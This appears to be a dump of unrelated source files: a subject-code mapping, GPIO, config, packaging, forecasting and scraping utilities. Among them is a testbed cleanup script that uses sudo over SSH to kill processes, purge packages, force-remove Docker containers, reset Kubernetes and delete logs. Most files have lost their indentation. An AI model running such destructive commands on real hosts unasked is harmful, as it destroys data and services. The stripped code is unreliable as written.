"Biophysics, Biomechanics":"PHY",
"Biophysics, General":"PHY",
"Biophysics, Medical":"PHY",
"Black Studies":"GEN",
"Business Administration, Accounting":"GEN",
"Business Administration, Banking":"GEN",
"Business Administration, Entrepreneurship":"GEN",
"Business Administration, General":"GEN",
"Business Administration, Management":"GEN",
"Business Administration, Marketing":"GEN",
"Canadian Studies":"GEN",
"Chemical Oceanography":"PHY",
"Chemistry, Agricultural":"GEN",
"Chemistry, Analytical":"GEN",
"Chemistry, Biochemistry":"GEN",
"Chemistry, General":"GEN",
"Chemistry, Inorganic":"GEN",
"Chemistry, Molecular":"GEN",
"Chemistry, Nuclear":"GEN",
"Chemistry, Organic":"GEN",
"Chemistry, Pharmaceutical":"GEN",
"Chemistry, Physical":"GEN",
"Chemistry, Polymer":"GEN",
"Chemistry, Radiation":"GEN",
"Cinema":"GEN",
"Climate Change":"PHY",
"Computer Science":"GEN",
"Continental Dynamics":"PHY",
"Cultural Resources Management":"GEN",
"Design and Decorative Arts":"GEN",
"Economics, Agricultural":"GEN",
"Economics, Commerce-Business":"GEN",
"Economics, Environmental":"GEN",
"Economics, Finance":"GEN",
"Economics, General":"GEN",
"Economics, History":"GEN",
"Economics, Labor":"GEN",
"Economics, Theory":"GEN",
"Education, Administration":"EDU",
"Education, Adult and Continuing":"EDU",
"Education, Agricultural":"EDU",
"Education, Art":"EDU",
"Education, Bilingual and Multicultural":"EDU",
"Education, Business":"EDU",
"Education, Community College":"EDU",
"Education, Continuing":"EDU",
"Education, Curriculum and Instruction":"EDU",
"Education, Early Childhood":"EDU",
"Education, Educational Psychology":"EDU",
"Education, Elementary":"EDU",
"Education, English as a Second Language":"EDU",
"Education, Environmental":"EDU",
"Education, Evaluation":"EDU",
"Education, Finance":"EDU",
"Education, General":"EDU",
"Education, Gifted":"EDU",
"Education, Guidance and Counseling":"EDU",
"Education, Health":"EDU",
"Education, Higher":"EDU",
"Education, History of":"EDU",
"Education, Industrial":"EDU",
"Education, Instructional Design":"EDU",
"Education, Language and Literature":"EDU",
"Education, Leadership":"EDU",
"Education, Mathematics":"EDU",
"Education, Middle School":"EDU",
"Education, Multilingual":"EDU",
"Education, Music":"EDU",
"Education, Pedagogy":"EDU",
"Education, Philosophy of":"EDU",
"Education, Physical":"EDU",
"Education, Policy":"EDU",
"Education, Reading":"EDU",
"Education, Religious":"EDU",
"Education, Sciences":"EDU",
"Education, Secondary":"EDU",
"Education, Social Sciences":"EDU",
"Education, Sociology of":"EDU",
"Education, Special":"EDU",
"Education, Teacher Training":"EDU",
"Education, Technology of":"EDU",
"Education, Tests and Measurements":"EDU",
"Education, Vocational":"EDU",
"Energy":"PHY",
"Engineering, Aerospace":"PHY",
"Engineering, Agricultural":"PHY",
"Engineering, Architectural":"PHY",
"Engineering, Automotive":"PHY",
"Engineering, Biomedical":"PHY",
"Engineering, Chemical":"PHY",
"Engineering, Computer":"GEN",
"Engineering, Civil":"PHY",
"Engineering, Electronics and Electrical":"PHY",
"Engineering, Environmental":"PHY",
"Engineering, General":"PHY",
"Engineering, Geological":"PHY",
"Engineering, Geophysical":"PHY",
"Engineering, Industrial":"PHY",
"Engineering, Marine and Ocean":"PHY",
"Engineering, Materials Science":"PHY",
"Engineering, Mechanical":"PHY",
"Engineering, Metallurgy":"PHY",
"Engineering, Mining":"PHY",
"Engineering, Naval":"PHY",
"Engineering, Nuclear":"PHY",
"Engineering, Packaging":"PHY",
"Engineering, Petroleum":"PHY",
"Engineering, Robotics":"PHY",
"Engineering, Sanitary and Municipal":"PHY",
"Engineering, System Science":"PHY",
"Environmental Health":"GEN",
"Environmental Law":"GEN",
"Environmental Management":"GEN",
"Environmental Sciences":"PHY",
"Environmental Studies":"GEN",
"Ethics":"GEN",
"Fine Arts":"GEN",
"Gender Studies":"GEN",
"Geobiology":"PHY",
"Geochemistry":"PHY",
"Geodesy":"PHY",
"Geography":"PHY",
"Geological Survey":"PHY",
"Geology":"PHY",
"Geomorphology":"PHY",
"Geophysics":"PHY",
"Geotechnology":"PHY",
"Gerontology":"GEN",
"GLBT Studies":"GEN",
"Health Sciences, Audiology":"GEN",
"Health Sciences, Dentistry":"GEN",
"Health Sciences, Education":"EDU",
"Health Sciences, Epidemiology":"GEN",
"Health Sciences, General":"GEN",
"Health Sciences, Human Development":"GEN",
"Health Sciences, Immunology":"GEN",
"Health Sciences, Medicine and Surgery":"GEN",
"Health Sciences, Nursing":"GEN",
"Health Sciences, Nutrition":"GEN",
"Health Sciences, Obstetrics and Gynecology":"GEN",
"Health Sciences, Occupational Health and Safety":"GEN",
"Health Sciences, Oncology":"GEN",
"Health Sciences, Ophthalmology":"GEN",
"Health Sciences, Pathology":"GEN",
"Health Sciences, Pharmacology":"GEN",
"Health Sciences, Pharmacy":"GEN",
"Health Sciences, Public Health":"GEN",
"Health Sciences, Radiology":"GEN",
"Health Sciences, Recreation":"GEN",
"Health Sciences, Rehabilitation and Therapy":"GEN",
"Health Sciences, Speech Pathology":"GEN",
"Health Sciences, Surgery":"GEN",
"Health Sciences, Toxicology":"GEN",
"Hispanic American Studies":"GEN",
"History of Science":"GEN",
"History, African":"GEN",
"History, Ancient":"GEN",
"History, Asia, Australia and Oceania":"GEN",
"History, Black":"GEN",
"History, Canadian":"GEN",
"History, European":"GEN",
"History, Latin American":"GEN",
"History, Medieval":"GEN",
"History, Modern":"GEN",
"History, United States":"GEN",
"Home Economics":"GEN",
"Hydrology":"PHY",
"Information Science":"GEN",
"Information Technology":"GEN",
"Journalism":"GEN",
"Land Use Planning":"GEN",
"Landscape Architecture":"GEN",
"Language, General":"GEN",
"Language, Linguistics":"GEN",
"Language, Modern":"GEN",
"Language, Rhetoric and Composition":"GEN",
"Latin American Studies":"GEN",
"Law":"GEN",
"Library Science":"GEN",
"Literature, American":"GEN",
"Literature, Classical":"GEN",
"Literature, English":"GEN",
"Literature, Modern":"GEN",
"Marine Geology":"PHY",
"Mass Communications":"GEN",
"Mathematics":"PHY",
"Meteorology":"PHY",
"Military Studies":"GEN",
"Mineralogy":"PHY",
"Museology":"GEN",
"Music":"GEN",
"Nanoscience":"PHY",
"Nanotechnology":"PHY",
"Native American Studies":"GEN",
"Natural Resource Management":"GEN",
"Operations Research":"GEN",
"Paleobotany":"PHY",
"Paleoclimate Science":"GEN",
"Paleoecology":"PHY",
"Paleontology":"PHY",
"Palynology":"PHY",
"Petroleum Geology":"PHY",
"Petrology":"PHY",
"Philosophy":"GEN",
"Philosophy of Science":"GEN",
"Physical Geography":"PHY",
"Physical Oceanography":"PHY",
"Physics, Acoustics":"PHY",
"Physics, Astronomy and Astrophysics":"AST",
"Physics, Astrophysics":"AST",
"Physics, Atmospheric Science":"PHY",
"Physics, Atomic":"PHY",
"Physics, Condensed Matter":"PHY",
"Physics, Electricity and Magnetism":"PHY",
"Physics, Elementary Particles and High Energy":"PHY",
"Physics, Fluid and Plasma":"PHY",
"Physics, General":"PHY",
"Physics, High Temperature":"PHY",
"Physics, Low Temperature":"PHY",
"Physics, Molecular":"PHY",
"Physics, Nuclear":"PHY",
"Physics, Optics":"PHY",
"Physics, Quantum":"PHY",
"Physics, Radiation":"PHY",
"Physics, Solid State":"PHY",
"Physics, Theory":"PHY",
"Planetology":"AST",
"Plastics Technology":"PHY",
"Plate Tectonics":"PHY",
"Political Science, General":"GEN",
"Political Science, International Law and Relations":"GEN",
"Political Science, International Relations":"GEN",
"Political Science, Public Administration":"GEN",
"Psychology, Behavioral":"GEN",
"Psychology, Clinical":"GEN",
"Psychology, Cognitive":"GEN",
"Psychology, Counseling":"GEN",
"Psychology, Developmental":"GEN",
"Psychology, Experimental":"GEN",
"Psychology, General":"GEN",
"Psychology, Industrial":"GEN",
"Psychology, Personality":"GEN",
"Psychology, Physiological":"GEN",
"Psychology, Psychobiology":"GEN",
"Psychology, Psychometrics":"GEN",
"Psychology, Social":"GEN",
"Recreation":"GEN",
"Religion, Biblical Studies":"GEN",
"Religion, General":"GEN",
"Religion, History of":"GEN",
"Religion, Philosophy of":"GEN",
"Remote Sensing":"PHY",
"Sedimentary Geology":"PHY",
"Social Work":"GEN",
"Sociology, Criminology and Penology":"GEN",
"Sociology, Demography":"GEN",
"Sociology, Environmental Justice":"GEN",
"Sociology, Ethnic and Racial Studies":"GEN",
"Sociology, General":"GEN",
"Sociology, Individual and Family Studies":"GEN",
"Sociology, Industrial and Labor Relations":"GEN",
"Sociology, Organizational":"GEN",
"Sociology, Public and Social Welfare":"GEN",
"Sociology, Social Structure and Development":"GEN",
"Sociology, Sociolinguistics":"GEN",
"Sociology, Theory and Methods":"GEN",
"Speech Communication":"GEN",
"Statistics":"GEN",
"Sub Saharan Africa Studies":"GEN",
"Sustainability":"GEN",
"Textile Technology":"GEN",
"Theater":"GEN",
"Theology":"GEN",
"Theoretical Mathematics":"PHY",
"Transportation":"GEN",
"Urban and Regional Planning":"GEN",
"Water Resource Management":"PHY",
"Web Studies":"GEN",
"Women's Studies":"GEN",
}
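# Example lookup (added for illustration, using an entry defined above):
#     PROQUEST_TO_DB.get("Physics, Astrophysics")  # -> "AST"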
# ===== next file =====
from gpiozero import LED
from time import sleep
import RPi.GPIO as GPIO
import time
class DisplayManager(object):
def __init__(self):
GPIO.setmode(GPIO.BOARD)
GPIO.setup(8, GPIO.OUT)
GPIO.setwarnings(False)
# Flash the LED logo at initialization
print("Init")
def DisplayLED(self, strImage):
print("Displaying " + strImage)
if 'bit' in strImage.lower():
GPIO.output(8, True)
print("On")
else:
GPIO.output(8, False)
            print("Off")
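# Hedged usage sketch (added; not in the original module):
#     dm = DisplayManager()
#     dm.DisplayLED("bitmap_logo.png")   # contains "bit" -> drives pin 8 high
#     dm.DisplayLED("other.png")         # no "bit"      -> drives pin 8 low
# The file names are assumptions; only the "bit" substring check above matters.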
# ===== next file: mapping/gis/yoink/config_io.py =====
'''Loading and saving of Config objects.
'''
import ConfigParser
import datetime, logging, os
from ordereddict import OrderedDict
from .config import Config
from .feed import Feed
from .util import fullpath
logger = logging.getLogger('yoink.config_io')
def _make_feed(config, cp, section):
'''Construct a Feed object from the data in a feed: section of the
config.
'''
assert section.startswith('feed:')
# If the timestamp is not stored in the config file, then We
# construct the earliest timestamp that datetime.datetime.strftime
# will work with (for some reason it doesn't like years before
# 1900.)
try:
timestamp = cp.get(section, 'timestamp')
timestamp = datetime.datetime.strptime(
cp.get(section, 'timestamp'),
Feed.TIME_FORMAT)
if timestamp.year < 1900:
timestamp = datetime.datetime(1900, 1, 1)
except ConfigParser.NoOptionError:
timestamp = datetime.datetime(1900, 1, 1)
return Feed(
name=section,
url=cp.get(section, 'url'),
folder=fullpath(
os.path.join(
cp.get('config', 'folder'),
cp.get(section, 'folder'))),
timestamp=timestamp,
config=config)
class ConfigIO(object):
'''A context-manager for loading and saving Configs.
Generally just use this as a context-manager. Note that the value
bound in the with-statement when using a `ConfigIO` is a `Config`
object, not the ConfigIO. For example::
with ConfigIO(filename='my_config', preview=True) as config:
...
# On non-exceptional __exit__, the ConfigIO saves the config.
'''
def __init__(self, filename, preview=False):
self.config_file = fullpath(filename)
self.cp = ConfigParser.ConfigParser(dict_type=OrderedDict)
self.preview = preview
logger.info('loading config file: {0}'.format(self.config_file))
self.cp.read(self.config_file)
self.config = Config(preview)
# Make one Feed instance for each feed: section
for section in (s for s in self.cp.sections() if s.startswith('feed:')):
self.config.feeds.append(
_make_feed(
self.config, self.cp, section))
def add_feed(self, feed):
self.cp.add_section(feed.name)
self.cp.set(feed.name,
'url',
feed.url)
self.cp.set(feed.name,
'folder',
feed.folder)
self.cp.set(feed.name,
'timestamp',
feed.timestamp.strftime(Feed.TIME_FORMAT))
def save(self):
# clear old feeds
for section in (s for s in self.cp.sections() if s.startswith('feed:')):
self.cp.remove_section(section)
for feed in self.config.feeds:
self.add_feed(feed)
# Save the config.
with open(self.config_file, 'w') as f:
logger.info('writing config file: {0}'.format(self.config_file))
self.cp.write(f)
def __enter__(self):
return self.config
def __exit__(self, t, v, tb):
        if not t: self.save()

# ===== next file =====
import pathlib
from setuptools import setup
with open("README.md", "r") as fh:
long_description = fh.read()
setup(
name="etnapy",
version="1.0.0",
author="<NAME>",
author_email="<EMAIL>",
description="A python wrapper around the ETNA School API",
long_description=long_description,
long_description_content_type="text/markdown",
url="https://github.com/Astropilot/etnapy",
license='MIT',
packages=['etnapy'],
classifiers=[
"Programming Language :: Python :: 3",
"License :: OSI Approved :: MIT License",
"Operating System :: OS Independent",
],
install_requires=["requests"],
)
# ===== next file =====
#!/usr/bin/env python
# Copyright (c) 2019 Cisco and/or its affiliates.
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at:
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""This script provides cleanup routines on all DUTs."""
import argparse
import sys
from platform import dist
from yaml import load
from resources.libraries.python.ssh import SSH
def execute_command_ssh(ssh, cmd, sudo=False):
"""Execute a command over ssh channel, and print outputs.
:param ssh: SSH() object connected to a node.
:param cmd: Command line to execute on remote node.
:param sudo: Run command with sudo privilege level..
:type ssh: SSH() object
:type cmd: str
:type sudo: bool
:returns return_code, stdout, stderr
:rtype: tuple(int, str, str)
"""
if sudo:
ret, stdout, stderr = ssh.exec_command_sudo(cmd, timeout=60)
else:
ret, stdout, stderr = ssh.exec_command(cmd, timeout=60)
print 'Executing: {cmd}'.format(cmd=cmd)
print '({ret}) {stdout} {stderr}'.format(ret=ret, stdout=stdout,
stderr=stderr)
return ret, stdout, stdout
def uninstall_package(ssh, package):
"""If there are packages installed, clean them up.
:param ssh: SSH() object connected to a node.
:param package: Package name.
:type ssh: SSH() object
:type package: str
"""
if dist()[0] == 'Ubuntu':
ret, _, _ = ssh.exec_command("dpkg -l | grep {package}".format(
package=package))
if ret == 0:
# Try to fix interrupted installations first.
execute_command_ssh(ssh, 'dpkg --configure -a', sudo=True)
# Try to remove installed packages
execute_command_ssh(ssh, 'apt-get purge -y "{package}.*"'.format(
package=package), sudo=True)
def kill_process(ssh, process):
"""If there are running processes, kill them.
:param ssh: SSH() object connected to a node.
:param process: Process name.
:type ssh: SSH() object
:type process: str
"""
execute_command_ssh(ssh, 'killall -v -s 9 {process}'.format(
process=process), sudo=True)
def main():
"""Testbed cleanup."""
parser = argparse.ArgumentParser()
parser.add_argument("-t", "--topo", required=True, help="Topology file")
args = parser.parse_args()
topology_file = args.topo
topology = load(open(topology_file).read())['nodes']
ssh = SSH()
for node in topology:
if topology[node]['type'] == "DUT":
print "###TI host: {}".format(topology[node]['host'])
ssh.connect(topology[node])
# Kill processes.
kill_process(ssh, 'qemu')
kill_process(ssh, 'l3fwd')
kill_process(ssh, 'testpmd')
# Uninstall packages
uninstall_package(ssh, 'vpp')
uninstall_package(ssh, 'honeycomb')
# Remove HC logs.
execute_command_ssh(ssh, 'rm -rf /var/log/honeycomb',
sudo=True)
# Kill all containers.
execute_command_ssh(ssh, 'docker rm --force $(sudo docker ps -q)',
sudo=True)
# Destroy kubernetes.
execute_command_ssh(ssh, 'kubeadm reset --force',
sudo=True)
# Remove corefiles leftovers.
execute_command_ssh(ssh, 'rm -f /tmp/*tar.lzo.lrz.xz*',
sudo=True)
# Remove corefiles leftovers.
execute_command_ssh(ssh, 'rm -f /tmp/*core*',
sudo=True)
if __name__ == "__main__":
sys.exit(main())
# ===== next file (repo: NicolasGrosjean/Paradox_Conflict_Detector) =====
import argparse
import os
def get_args():
parser = argparse.ArgumentParser(
description="Detect conflicts between Paradox mods"
)
parser.add_argument(
"mod_repo_path",
type=str,
help="Path of the directory containing all the mods",
)
parser.add_argument(
"file_exception_path",
type=str,
help="Path of a file containing at each line a file name which can duplicated between mods",
)
parser.add_argument(
"-filtering_mod_path",
type=str,
help="Path of a file containing at each line a mod name in which conflicts will be computed",
)
parser.add_argument(
"-playset_name",
type=str,
help="Name of playset saved in Paradox launcher to compute conflicts only on these mods. Can be chained with filtering_mod_path",
)
return parser.parse_args()
class ModMetadata:
name: str
path: str
NORMAL_DUPLICATED_FILES = ["descriptor.mod", "thumbnail.png"]
def read_param_file(path: str) -> list[str]:
with open(path, "r") as f:
lines = f.readlines()
for i in range(len(lines)):
lines[i] = lines[i].replace("\n", "")
return lines
def read_mod_descriptor_file(path: str) -> ModMetadata:
res = ModMetadata()
with open(path, "r") as f:
lines = f.readlines()
for line in lines:
s_line = line.split("=")
if s_line[0] == "name":
res.name = s_line[1].replace("\n", "").replace('"', "")
elif s_line[0] == "path":
res.path = s_line[1].replace("\n", "").replace('"', "")
return res
def list_mod_files(mod_path: str) -> set[str]:
res = set()
for _, _, files in os.walk(mod_path):
for file in files:
res.add(file)
return res
def index_mod_by_files(
mod_repo_path: str,
filtering_mod_names: list[str],
filtering_mod_files: list[str],
) -> dict:
"""
Return dictionary with file names as keys, and list of mod names (from mod_repo_path) which have this file.
    Mods are filtered by name (filtering_mod_names) or descriptor file name (filtering_mod_files) when those lists are non-empty.
"""
mods_by_file = dict()
filtering_names = len(filtering_mod_names) > 0
filtering_files = len(filtering_mod_files) > 0
for mod_desc_file in os.listdir(mod_repo_path):
if not mod_desc_file.endswith("mod"):
continue
metadata = read_mod_descriptor_file(os.path.join(mod_repo_path, mod_desc_file))
if filtering_names:
if metadata.name not in filtering_mod_names:
if mod_desc_file in filtering_mod_files:
filtering_mod_files.remove(mod_desc_file)
continue
else:
filtering_mod_names.remove(metadata.name)
if filtering_files:
if mod_desc_file not in filtering_mod_files:
continue
else:
filtering_mod_files.remove(mod_desc_file)
mod_files = list_mod_files(
os.path.join(mod_repo_path, metadata.path[4:])
if metadata.path.startswith("mod/")
else metadata.path
)
for file in mod_files:
if file not in mods_by_file:
mods_by_file[file] = []
mods_by_file[file].append(metadata.name)
if len(filtering_mod_names) > 0:
print(
f"ERROR : {len(filtering_mod_names)} mods not found : {filtering_mod_names}\n\n"
)
if len(filtering_mod_files) > 0:
print(
f"ERROR : {len(filtering_mod_files)} mods not found : {filtering_mod_files}\n\n"
)
return mods_by_file
def detect_conflicts(
mod_repo_path: str,
file_exceptions=NORMAL_DUPLICATED_FILES,
filtering_mod_names=[],
filtering_mod_files=[],
) -> dict:
"""
    Return a dictionary following this example: {mod1: {mod2: ['file1', 'file2'], mod3: ['file42']}}
Returned files are not in file_exceptions
"""
conflicts_by_mod = dict()
mods_by_file = index_mod_by_files(
mod_repo_path, filtering_mod_names, filtering_mod_files
)
for file, mods in mods_by_file.items():
if len(mods) > 1 and file not in file_exceptions:
for mod in mods:
if mod not in conflicts_by_mod:
conflicts_by_mod[mod] = dict()
for mod2 in mods:
if mod == mod2:
continue
if mod2 not in conflicts_by_mod[mod]:
conflicts_by_mod[mod][mod2] = []
conflicts_by_mod[mod][mod2].append(file)
return conflicts_by_mod
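# Hedged example (added) of the structure detect_conflicts returns: if ModA and ModB
# both ship "units.txt" (and it is not in file_exceptions), the result looks like
#     {"ModA": {"ModB": ["units.txt"]}, "ModB": {"ModA": ["units.txt"]}}
# The mod and file names here are made up for illustration.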
if __name__ == "__main__":
args = get_args()
file_exceptions = read_param_file(args.file_exception_path)
filtering_mod_names = []
filtering_mod_files = []
if args.filtering_mod_path is not None:
filtering_mod_names = read_param_file(args.filtering_mod_path)
if args.playset_name is not None:
from read_playset import read_playsets # Import here to avoid dependency in sqlite3 if not needed
playsets = read_playsets(
os.path.join(args.mod_repo_path, "..", "launcher-v2.sqlite")
).values()
playset_found = False
for playset in playsets:
if args.playset_name == playset["name"]:
for mod in playset["mods"]:
filtering_mod_files.append(mod['mod_file_name'])
playset_found = True
break
if not playset_found:
print(f"ERROR: playset {args.playset_name} not found")
exit(0)
conflicts_by_mod = detect_conflicts(
args.mod_repo_path,
file_exceptions,
filtering_mod_names,
filtering_mod_files
)
for mod in conflicts_by_mod:
print(f"Conflicts with {mod}:")
for mod2 in conflicts_by_mod[mod]:
print(f"- {mod2}: {conflicts_by_mod[mod][mod2]}")
print("\n")
# ===== next file =====
##Patterns: E1124
def my_method(arg1, arg2):
print arg1 + arg2
def main():
##Err: E1124
my_method(1, arg1=2)
    my_method(1, 2)

# ===== next file =====
import torch
# Methods for calculating properties of simulation system
class Observables():
def __init__(self, observable_dict):
supported_observables = ['kinetic_energy', 'angles']
    def kinetic_energy(self, ):
        # Body is missing in the source snippet; 'pass' keeps the class importable.
        pass

# ===== next file =====
# convenience wrapper for urllib2 & friends
import cookielib
import json
import urllib
import urllib2
import urlparse
import re
from urllib import quote, quote_plus as _quote_plus
from lxml import etree, html
from bs4 import BeautifulSoup
# used in plugins that import this
from urllib2 import URLError, HTTPError
ua_firefox = 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:17.0) Gecko/17.0' \
' Firefox/17.0'
ua_old_firefox = 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; ' \
'rv:1.8.1.6) Gecko/20070725 Firefox/2.0.0.6'
ua_internetexplorer = 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)'
ua_chrome = 'Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.4 (KHTML, ' \
'like Gecko) Chrome/22.0.1229.79 Safari/537.4'
jar = cookielib.CookieJar()
def get(*args, **kwargs):
return open(*args, **kwargs).read()
def get_url(*args, **kwargs):
return open(*args, **kwargs).geturl()
def get_html(*args, **kwargs):
return html.fromstring(get(*args, **kwargs))
def get_soup(*args, **kwargs):
return BeautifulSoup(get(*args, **kwargs), 'lxml')
def get_xml(*args, **kwargs):
return etree.fromstring(get(*args, **kwargs))
def get_json(*args, **kwargs):
return json.loads(get(*args, **kwargs))
def open(url, query_params=None, user_agent=None, post_data=None,
referer=None, get_method=None, cookies=False, **kwargs):
if query_params is None:
query_params = {}
if user_agent is None:
user_agent = ua_firefox
query_params.update(kwargs)
url = prepare_url(url, query_params)
request = urllib2.Request(url, post_data)
if get_method is not None:
request.get_method = lambda: get_method
request.add_header('User-Agent', user_agent)
if referer is not None:
request.add_header('Referer', referer)
if cookies:
opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(jar))
else:
opener = urllib2.build_opener()
return opener.open(request)
def prepare_url(url, queries):
if queries:
scheme, netloc, path, query, fragment = urlparse.urlsplit(url)
query = dict(urlparse.parse_qsl(query))
query.update(queries)
query = urllib.urlencode(dict((to_utf8(key), to_utf8(value))
for key, value in query.iteritems()))
url = urlparse.urlunsplit((scheme, netloc, path, query, fragment))
return url
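# Hedged example (added): prepare_url('http://example.com/search?q=1', {'page': 2})
# returns something like 'http://example.com/search?q=1&page=2' (query-parameter order
# is not guaranteed because the parameters pass through a dict).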
def to_utf8(s):
if isinstance(s, unicode):
return s.encode('utf8', 'ignore')
else:
return str(s)
# def quote(s):
# return urllib.quote(s)
def quote_plus(s):
return _quote_plus(to_utf8(s))
def unquote(s):
return urllib.unquote(s)
def unescape(s):
if not s.strip():
return s
return html.fromstring(s).text_content()
def strip_html(html):
tag = False
quote = False
out = ""
for c in html:
if c == '<' and not quote: tag = True
elif c == '>' and not quote: tag = False
elif (c == '"' or c == "'") and tag: quote = not quote
elif not tag: out = out + c
return out
def decode_html(string):
import re
entity_re = re.compile("&(#?)(\d{1,5}|\w{1,8});")
def substitute_entity(match):
from htmlentitydefs import name2codepoint as n2cp
ent = match.group(2)
if match.group(1) == "#":
return unichr(int(ent))
else:
cp = n2cp.get(ent)
if cp:
return unichr(cp)
else:
return match.group()
return entity_re.subn(substitute_entity, string)[0]
def clean_html(string):
import HTMLParser
h = HTMLParser.HTMLParser()
return h.unescape(string)
#clean up html chars
#out = HTMLParser.HTMLParser().unescape(out)
#out = out.replace("&","&").replace(""",'"').replace(''',"'").replace("<","<").replace(">",">").replace("–","-").replace('/','/')
#.renderContents().strip().decode('utf-8').replace('<br/>', ' ')
# post = re.sub('[\s]{3,}',' ',post) #remove multiple spaces
def process_text(string):
try: string = string.replace('<br/>',' ').replace('\n',' ')
except: pass
string = re.sub('>>\d*[\s]','',string) #remove quoted posts
string = re.sub('(>>\d*)','',string)
try: string = unicode(string, "utf8")
except: pass
try: string = strip_html(string)
except: pass
try: string = decode_html(string)
except: pass
try: string = string.decode('utf-8').strip()
except: pass
string = re.sub('[\s]{3,}',' ',string)
return string
def is_active(url):
try:
f = urllib2.urlopen(urllib2.Request(url))
return True
except:
return False
def get_element(soup,element,idclass=None,selector=None):
if idclass: result = soup.find(element, {idclass: selector}).renderContents().strip()
else: result = soup.find(element).renderContents().strip()
return process_text(result)
# while u',,' in page:
#     page = page.replace(u',,', u',"",')

# ===== next file =====
class Solution:
def brokenCalc(self, X: int, Y: int) -> int:
count = 0
while Y>X:
if Y%2==0:
Y //= 2
else:
Y += 1
count += 1
return count + X - Y
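    # Hedged examples (added): brokenCalc works backwards from Y, halving when even and
    # incrementing when odd, then walks the remaining distance down to X with decrements.
    #     Solution().brokenCalc(5, 8)  # -> 2  (forward: 5 - 1 = 4, 4 * 2 = 8)
    #     Solution().brokenCalc(2, 3)  # -> 2  (forward: 2 * 2 = 4, 4 - 1 = 3)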
# ===== next file (repo: thinkgradient/solution-accelerator-many-models) =====
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License.
from azureml.core import Run
import pandas as pd
import numpy as np
import os
import argparse
import datetime
import joblib
from sklearn.metrics import mean_squared_error, mean_absolute_error
from sklearn.linear_model import LinearRegression
from timeseries_utilities import ColumnDropper, SimpleLagger, SimpleCalendarFeaturizer, SimpleForecaster
# 0.0 Parse input arguments
parser = argparse.ArgumentParser("split")
parser.add_argument("--target_column", type=str, required=True, help="input target column")
parser.add_argument("--timestamp_column", type=str, required=True, help="input timestamp column")
parser.add_argument("--timeseries_id_columns", type=str, nargs='*', required=True,
help="input columns identifying the timeseries")
parser.add_argument("--drop_columns", type=str, nargs='*', default=[],
help="list of columns to drop prior to modeling")
parser.add_argument("--model_type", type=str, required=True, help="input model type")
parser.add_argument("--test_size", type=int, required=True, help="number of observations to be used for testing")
args, _ = parser.parse_known_args()
current_run = None
def init():
global current_run
current_run = Run.get_context()
def run(input_data):
# 1.0 Set up output directory and the results list
os.makedirs('./outputs', exist_ok=True)
result_list = []
# 2.0 Loop through each file in the batch
# The number of files in each batch is controlled by the mini_batch_size parameter of ParallelRunConfig
for idx, csv_file_path in enumerate(input_data):
result = {}
start_datetime = datetime.datetime.now()
file_name = os.path.basename(csv_file_path)[:-4]
model_name = args.model_type + '_' + file_name
# 1.0 Read the data from CSV - parse timestamps as datetime type and put the time in the index
data = (pd.read_csv(csv_file_path, parse_dates=[args.timestamp_column], header=0)
.set_index(args.timestamp_column)
.sort_index(ascending=True))
# 2.0 Split the data into train and test sets
train = data[:-args.test_size]
test = data[-args.test_size:]
# 3.0 Create and fit the forecasting pipeline
# The pipeline will drop unhelpful features, make a calendar feature, and make lag features
lagger = SimpleLagger(args.target_column, lag_orders=[1, 2, 3, 4])
transform_steps = [('column_dropper', ColumnDropper(args.drop_columns)),
('calendar_featurizer', SimpleCalendarFeaturizer()), ('lagger', lagger)]
forecaster = SimpleForecaster(transform_steps, LinearRegression(), args.target_column, args.timestamp_column)
forecaster.fit(train)
print('Featurized data example:')
print(forecaster.transform(train).head())
# 4.0 Get predictions on test set
forecasts = forecaster.forecast(test)
compare_data = test.assign(forecasts=forecasts).dropna()
# 5.0 Calculate accuracy metrics for the fit
mse = mean_squared_error(compare_data[args.target_column], compare_data['forecasts'])
rmse = np.sqrt(mse)
mae = mean_absolute_error(compare_data[args.target_column], compare_data['forecasts'])
actuals = compare_data[args.target_column].values
preds = compare_data['forecasts'].values
mape = np.mean(np.abs((actuals - preds) / actuals) * 100)
# 6.0 Log metrics
current_run.log(model_name + '_mse', mse)
current_run.log(model_name + '_rmse', rmse)
current_run.log(model_name + '_mae', mae)
current_run.log(model_name + '_mape', mape)
# 7.0 Train model with full dataset
forecaster.fit(data)
# 8.0 Save the forecasting pipeline
joblib.dump(forecaster, filename=os.path.join('./outputs/', model_name))
# 9.0 Register the model to the workspace
# Uses the values in the timeseries id columns from the first row of data to form tags for the model
current_run.upload_file(model_name, os.path.join('./outputs/', model_name))
ts_id_dict = {id_col: str(data[id_col].iloc[0]) for id_col in args.timeseries_id_columns}
tags_dict = {**ts_id_dict, 'ModelType': args.model_type}
current_run.register_model(model_path=model_name, model_name=model_name,
model_framework=args.model_type, tags=tags_dict)
# 10.0 Add data to output
end_datetime = datetime.datetime.now()
result.update(ts_id_dict)
result['model_type'] = args.model_type
result['file_name'] = file_name
result['model_name'] = model_name
result['start_date'] = str(start_datetime)
result['end_date'] = str(end_datetime)
result['duration'] = str(end_datetime-start_datetime)
result['mse'] = mse
result['rmse'] = rmse
result['mae'] = mae
result['mape'] = mape
result['index'] = idx
result['num_models'] = len(input_data)
result['status'] = current_run.get_status()
print('ending (' + csv_file_path + ') ' + str(end_datetime))
result_list.append(result)
# Data returned by this function will be available in parallel_run_step.txt
return pd.DataFrame(result_list)
| StarcoderdataPython |
1769470 | # Licensed to the StackStorm, Inc ('StackStorm') under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from oslo.config import cfg
from st2common import config as st2cfg
from st2common.constants.system import VERSION_STRING
CONF = cfg.CONF
